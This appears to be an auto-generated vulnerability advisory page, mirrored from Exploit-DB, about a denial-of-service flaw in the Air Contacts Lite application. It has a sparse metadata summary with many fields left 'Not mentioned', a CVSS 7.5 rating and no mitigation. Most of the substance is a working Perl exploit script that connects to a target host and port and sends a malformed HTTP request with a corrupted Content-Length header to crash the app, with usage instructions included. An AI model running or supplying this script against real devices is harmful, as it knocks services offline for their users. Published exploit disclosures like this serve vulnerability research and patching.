Air Contacts Lite Denial-of-Service Vulnerability

vendor:

Air Contacts Lite

by:

Not mentioned

7.5

CVSS

HIGH

Denial-of-Service

Not mentioned

CWE

Product Name: Air Contacts Lite

Affected Version From: Not mentioned

Affected Version To: Not mentioned

Patch Exists: No

Related CWE: Not mentioned

CPE: Not mentioned

Metasploit:

Other Scripts:

Platforms Tested: Not mentioned

Not mentioned

Air Contacts Lite Denial-of-Service Vulnerability

The Air Contacts Lite application is vulnerable to a denial-of-service attack. An attacker can exploit this vulnerability by sending a crafted request to the application, causing it to crash and result in a denial-of-service condition.

Mitigation:

No mitigation or remediation mentioned

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46827/info

Air Contacts Lite is prone a denial-of-service vulnerability.

Successful exploits may allow an attacker to crash the affected application, resulting in a denial-of-service condition. 

#!/usr/bin/perl
use IO::Socket;
      if (@ARGV < 1) {
              usage();
      }
      $ip     = $ARGV[0];
      $port   = $ARGV[1];
      print "[+] Sending request...\n";
      $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
      print $socket "GET http://www.example.com. HTTP/1.1\r\n";
      print $socket "Host: http://www.example.com.\r\n";
      print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";
      sleep(2);
      close($socket);
      print "[+] Done!\n";

sub usage() {
      print "[-] example - Air Contacts Lite (DoS)\n\n";
      print "[-] Usage: <". $0 ."> <host> <port>\n";
      print "[-] Example: ". $0 ." 127.0.0.1 80\n";
      exit;
}